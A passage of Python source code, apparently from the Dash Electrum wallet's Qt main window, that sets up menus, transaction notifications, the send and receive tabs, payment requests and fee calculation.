self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.dip3_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Dash Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Dash Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate, num_zeros=self.num_zeros) + ' duffs/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
self.masternode_manager.send_subscriptions()
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_proposals_tab()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'),
_('The Dash address never expires and will always be part of this Dash Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} duffs are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.extra_payload = ExtraPayloadWidget(self)
self.extra_payload.hide()
msg = _('Extra payload.') + '\n\n'\
+ _('Dash DIP2 Special Transations extra payload.')
self.extra_payload_label = HelpLabel(_('Extra payload'), msg)
self.extra_payload_label.hide()
grid.addWidget(self.extra_payload_label, 7, 0)
grid.addWidget(self.extra_payload, 7, 1, 1, -1)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Dash Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 duffs might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
(outputs, fee_estimator, tx_desc, coins,
tx_type, extra_payload) = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep,
tx_type=tx_type, extra_payload=extra_payload)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
